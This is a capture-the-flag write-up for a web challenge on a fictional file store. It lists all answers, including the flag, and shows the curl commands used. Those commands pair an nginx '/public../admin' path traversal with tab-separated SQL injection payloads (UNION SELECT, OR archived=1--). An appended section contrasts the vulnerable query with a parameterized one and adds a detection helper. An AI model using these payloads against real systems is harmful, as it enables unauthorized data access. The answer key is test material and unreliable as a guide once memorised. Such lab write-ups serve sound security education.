Web Application Exploitation Challenge 2 - Liber8tion File Store

Prompt

We have gained access to the Liber8tion File Store documentation. We need you to extract the hidden image from deep within the Liber8tion archives. Are you up for the challenge?


Answers

Q1 (10 pts) - What is the query parameter used for the public search endpoint?
s

Q2 (10 pts) - What reverse proxy does Liber8tion use to serve content and enforce authentication?
NGINX

Q3 (15 pts) - What is the expected key for the image file in the reverse search endpoint?
image-query

Q4 (15 pts) - How many images are publicly available (archived == false)?
0

Q5 (15 pts) - What is the name of the vulnerability class affecting the reverse search endpoint?
SQL Injection

Q6 (15 pts) - How many images are archived?
1

Q7 (20 pts) - What is the flag hidden in the archived image?
SKY-TSRA-9245


Steps I Took

For Q1 - went to the API Reference, and it showed the parameter.

Screenshot

For Q2 - it says nginx configuration under Deployments.

Screenshot

Q3 - got the source code by accessing the admin page. Used this URL to access it: https://00bdaecc031b4e3c3aa5a863693ca01a-filestore.web.cityinthe.cloud/public../admin . I knew about the admin page because of the nginx config.

Screenshot

Screenshot

The nginx config showed this:

location /public {
proxy_pass http://backend:8080/v1/;
}

meaning anything you put after /public is forwarded to the backend with the /public prefix replaced by /v1/.

Q4

printf "x''\tUNION\tSELECT\tcount(*)\tFROM\timages\tWHERE\tarchived=0--\t" > count_public.txt

curl --path-as-is -s -X POST \
  'https://00bdaecc031b4e3c3aa5a863693ca01a-filestore.web.cityinthe.cloud/public../admin/reverse-search' \
  -F 'image-query=@count_public.txt' \
  -o count_public.json

cat count_public.json

Q5 - SQL Injection; it is obvious.

Q6

printf "x''\tUNION\tSELECT\tcount(*)\tFROM\timages\tWHERE\tarchived=1--\t" > count_archived.txt

curl --path-as-is -s -X POST \
  'https://00bdaecc031b4e3c3aa5a863693ca01a-filestore.web.cityinthe.cloud/public../admin/reverse-search' \
  -F 'image-query=@count_archived.txt' \
  -o count_archived.json

grep -oP '\[\[\K[0-9]+' count_archived.json

Q7 - Had to use AI for most of this part. This was identified as vulnerable to SQL injection due to it directly injecting user input:

const query = `SELECT image FROM images WHERE image = '${image}' AND archived = 0`;

Crafted the exploit:

printf "x''\tOR\tarchived=1--\t" > exploit.txt

curl --path-as-is -X POST \
  'https://TARGET/public../admin/reverse-search' \
  -F 'image-query=@exploit.txt'

It sends base64 back; it had a lot of pointless data.

grep -oP 'iVBORw0KGgo[^"]+' "Pasted text.txt" > clean.txt
tr -d '\n' < clean.txt | base64 -d > flag.png

Screenshot
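The Q7 query above, built the vulnerable way and the parameterized way, plus a small check that spots keywords escaping a string literal. This is an added example, not the challenge's own code; the $1 placeholder style follows node-postgres and is an assumption about the backend, and the payload is constructed to match the shape of the write-up's input.

```javascript
// Added example, not the challenge's own code: the Q7 reverse-search query built the
// vulnerable way and the parameterized way. The $1 placeholder follows the
// node-postgres convention, which is an assumption about the backend.

// Vulnerable: the submitted value is interpolated into the SQL text, so a quote in it
// ends the literal and whatever follows is parsed as part of the statement.
function buildQueryVulnerable(image) {
  return `SELECT image FROM images WHERE image = '${image}' AND archived = 0`;
}

// Hardened: the SQL text is constant and the value travels as a bound parameter, so
// quotes, comment markers and keywords in it are compared as characters, never parsed.
function buildQuerySafe(image) {
  return {
    text: 'SELECT image FROM images WHERE image = $1 AND archived = 0',
    values: [image],
  };
}

// Review/test aid: count SQL keywords that sit outside single-quoted literals, treating
// '' inside a literal as an escaped quote. The intended query has exactly one SELECT,
// FROM, WHERE and AND and no OR or UNION; anything else means input left its literal.
function keywordsOutsideLiterals(sql) {
  const keywords = new Set(['SELECT', 'FROM', 'WHERE', 'AND', 'OR', 'UNION']);
  const counts = {};
  let inLiteral = false;
  let token = '';
  const flush = () => {
    const kw = token.toUpperCase();
    if (keywords.has(kw)) counts[kw] = (counts[kw] || 0) + 1;
    token = '';
  };
  for (let i = 0; i < sql.length; i++) {
    const ch = sql[i];
    if (inLiteral) {
      if (ch === "'" && sql[i + 1] === "'") { i++; continue; } // '' escape stays inside
      if (ch === "'") inLiteral = false;
      continue;
    }
    if (ch === "'") { flush(); inLiteral = true; continue; }
    if (/[A-Za-z_]/.test(ch)) token += ch; else flush();
  }
  flush();
  return counts;
}

// Constructed input with the shape of the write-up's Q7 payload (not the exact bytes).
const PAYLOAD = "x' OR archived=1--";
```

Run keywordsOutsideLiterals over buildQueryVulnerable(PAYLOAD) and an OR shows up outside any literal, while buildQuerySafe(PAYLOAD).text is unchanged and the payload sits in values.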